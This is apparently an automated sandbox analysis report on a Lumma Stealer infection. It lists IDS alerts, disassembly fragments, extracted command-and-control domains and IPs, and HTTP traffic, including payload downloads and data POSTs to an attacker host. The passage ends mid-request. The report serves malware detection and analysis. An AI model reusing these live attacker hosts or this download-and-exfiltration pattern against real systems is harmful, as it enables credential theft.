                            Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49978 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49979 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49980 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49981 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49982 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49983 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.7:49984 version: TLS 1.2
                            Source: soft.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Source: Binary string: msvcp100.i386.pdb source: is-21QH6.tmp.12.dr
                            Source: Binary string: msvcr100.i386.pdb source: is-HP0G4.tmp.12.dr
                            Source: Binary string: wextract.pdb source: MnzBi21FK.exe, 0000000E.00000000.1827835811.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe, 0000000E.00000002.1849429216.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe.9.dr, UNIQ[1].file.9.dr
                            Source: Binary string: wextract.pdbGCTL source: MnzBi21FK.exe, 0000000E.00000000.1827835811.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe, 0000000E.00000002.1849429216.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe.9.dr, UNIQ[1].file.9.dr
                            Source: Binary string: BitLockerToGo.pdb source: soft.exe, 00000005.00000002.1724312184.000000000A004000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: BitLockerToGo.pdbGCTL source: soft.exe, 00000005.00000002.1724312184.000000000A004000.00000004.00001000.00020000.00000000.sdmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_00452AD4 FindFirstFileA,GetLastError, | 12_2_00452AD4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_00475798 FindFirstFileA,FindNextFileA,FindClose, | 12_2_00475798
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, | 12_2_0046417C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, | 12_2_004645F8
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose, | 12_2_00462BF0
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, | 12_2_00498FDC
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe | Code function: 14_2_00007FF7444E204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, | 14_2_00007FF7444E204C

                            Software Vulnerabilities

                            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl23_2_0041284C
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl23_2_0041284C
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h]23_2_0041284C
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+10h]23_2_0044F870
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ecx], dx23_2_0044F870
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], CA198B66h23_2_0044A030
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6D58C181h23_2_00446170
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C0F3A0E1h23_2_0044C1C6
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea ecx, dword ptr [eax+2D321BFEh]23_2_00413183
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-62h]23_2_004312E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx-014B2F66h]23_2_0040FAE9
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], al23_2_00437B25
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl23_2_00437B25
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]23_2_0044FBA0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]23_2_00438C5C
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h23_2_0044E420
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]23_2_0044E550
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebp, edx23_2_0044E550
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-004F7DAAh]23_2_0044F630
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ecx], dx23_2_0044F630
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov esi, eax23_2_0041BFAA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]23_2_0041B040
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [edx+esi-444800C2h]23_2_00430042
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ebx], al23_2_00439063
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h23_2_0043500F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]23_2_00448032
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h23_2_004470E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80AFh]23_2_004470E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]23_2_004488E3
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-444800C2h]23_2_004308F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h23_2_004308F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], al23_2_004228F8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-1Ah]23_2_0044B88A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp ecx23_2_00434948
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ebp+00h], cx23_2_0042A950
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80A4h]23_2_00421160
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 64DAE379h23_2_00421160
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], CA198B66h23_2_00421160
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esp+000000D0h], 00000000h23_2_0041D91E
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]23_2_0044A980
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]23_2_0044A980
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], al23_2_004381B4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl23_2_004381B4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80AFh]23_2_00447A40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]23_2_0041D25F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]23_2_0041C74B
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h23_2_0044EA10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]23_2_0040A220
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]23_2_0040A220
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], al23_2_00422E97
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], al23_2_00422E97
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then add ebp, dword ptr [esp+0Ch] 23_2_00436AF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movsx esi, byte ptr [ebx+eax] 23_2_0044DAF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [edx+esi] 23_2_0044DAF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch] 23_2_0044DAF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h 23_2_0042A2B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, dword ptr [ebp-24h] 23_2_00433343
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [ebx+edx] 23_2_00433343
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 23_2_00443350
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esp+000000D0h], 00000000h 23_2_0041D361
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [eax+edx] 23_2_00426370
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [eax+ecx] 23_2_004343D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then push 00000000h 23_2_0043039F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esp+2Ch], ebx 23_2_00410C50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [eax], cl 23_2_00439404
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 23_2_00435430
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 23_2_00429CE0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [eax], cl 23_2_00412CEC
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h] 23_2_00412CEC
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [edx+ecx*8], 7A542AABh 23_2_0044ED50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebp, word ptr [ecx] 23_2_0044ED50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h] 23_2_0044FD60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [edx+ebx*8], 744E5843h 23_2_0044A580
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 23_2_00433E60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp ecx 23_2_004346F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h 23_2_004346F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+6AB32A06h] 23_2_004346F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax] 23_2_0044B6F3
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esp], edx 23_2_00422EFA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, dword ptr [ebp-24h] 23_2_00433680
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [ebx+edx] 23_2_00433680
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [esi], cl 23_2_00439E9A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebp, byte ptr [esp+ecx] 23_2_0040BEA0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [esi], cl 23_2_00438F44
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movsx esi, byte ptr [ebx+eax] 23_2_0044D750
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [edx+esi] 23_2_0044D750
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch] 23_2_0044D750
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2Ch] 23_2_00431760
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp eax 23_2_00431760
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h 23_2_00431760
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ecx], dl 23_2_0041DF2A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-06E9A8FEh] 23_2_004207F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [esi], cl 23_2_00438F82
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [esi], cl 23_2_00438F93
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch] 23_2_0044DF90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ecx, dword ptr [00458390h] 23_2_004137A2

                            Networking

                            barindex
                            Source: Network traffic Suricata IDS: 2060420 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (starrynsightsky .icu) : 192.168.2.7:60248 -> 1.1.1.1:53
                            Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49977 -> 104.21.64.1:443
                            Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49976 -> 104.21.64.1:443
                            Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49976 -> 104.21.64.1:443
                            Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49978 -> 104.21.64.1:443
                            Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49983 -> 104.21.64.1:443
                            Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.108.153:443 -> 192.168.2.7:49974
                            Source: Malware configuration extractor URLs: starrynsightsky.icu
                            Source: Malware configuration extractor URLs: hardswarehub.today
                            Source: Malware configuration extractor URLs: tracnquilforest.life
                            Source: Malware configuration extractor URLs: hardrwarehaven.run
                            Source: Malware configuration extractor URLs: seizedsentec.online
                            Source: Malware configuration extractor URLs: codxefusion.top
                            Source: Malware configuration extractor URLs: quietswtreams.life
                            Source: Malware configuration extractor IPs: 45.91.200.135
                            Source: Malware configuration extractor IPs: 185.156.73.73
                            Source: global traffic TCP traffic: 192.168.2.7:49985 -> 195.154.243.38:2024
                            Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
                                Date: Sat, 01 Mar 2025 08:48:14 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Disposition: attachment; filename="UNIQTWO.file";
                                Content-Length: 3795764
                                Keep-Alive: timeout=5, max=97
                                Connection: Keep-Alive
                                Content-Type: application/octet-stream
                            Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
                                Date: Sat, 01 Mar 2025 08:48:19 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Disposition: attachment; filename="UNIQ.file";
                                Content-Length: 163328
                                Keep-Alive: timeout=5, max=96
                                Connection: Keep-Alive
                                Content-Type: application/octet-stream
                            Source: global traffic HTTP traffic detected: GET /dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113 HTTP/1.1
                                Host: bitbucket.org
                                Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /1/test.jpg HTTP/1.1
                                Host: ofice365.github.io
                                Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /public_files/hkkcrng.txt HTTP/1.1
                                Host: 62.60.226.112
                                Connection: Keep-Alive
                            Source: Joe Sandbox View IP Address: 185.156.73.73
                            Source: Joe Sandbox View IP Address: 185.166.143.48
                            Source: Joe Sandbox View IP Address: 104.21.64.1
                            Source: Joe Sandbox View ASN Name: RELDAS-NETRU
                            Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
                            Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                            Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49977 -> 104.21.64.1:443
                            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49978 -> 104.21.64.1:443
                            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49976 -> 104.21.64.1:443
                            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49979 -> 104.21.64.1:443
                            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49981 -> 104.21.64.1:443
                            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49982 -> 104.21.64.1:443
                            Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49984 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49986 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49987 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49983 -> 104.21.64.1:443
                            Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49990 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49989 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49995 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49991 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49992 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49993 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49994 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49980 -> 104.21.64.1:443
                            Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49991 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49984 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49986 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49993 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49994 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49995 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49989 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49992 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49990 -> 176.113.115.96:443
                            Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49987 -> 176.113.115.96:443
                            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 8
                                Host: hardswarehub.today
                            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                Cookie: __cf_mw_byp=7qzdIc0C79pXh_MLDe9UfURTKNBspcueSuOUtyhuXXU-1740818918-0.0.1.1-/api
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 43
                                Host: hardswarehub.today
                            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=FVS0H4HZWOR6
                                Cookie: __cf_mw_byp=7qzdIc0C79pXh_MLDe9UfURTKNBspcueSuOUtyhuXXU-1740818918-0.0.1.1-/api
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 12805
                                Host: hardswarehub.today
                            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=X4AXIVUV1PNMN5OU
                                Cookie: __cf_mw_byp=7qzdIc0C79pXh_MLDe9UfURTKNBspcueSuOUtyhuXXU-1740818918-0.0.1.1-/api
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 15061
                                Host: hardswarehub.today
                            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=JNRWG4N5YC
                                Cookie: __cf_mw_byp=7qzdIc0C79pXh_MLDe9UfURTKNBspcueSuOUtyhuXXU-1740818918-0.0.1.1-/api
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 20350
                                Host: hardswarehub.today
                            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=O1662KFEROPMNA5RZZ
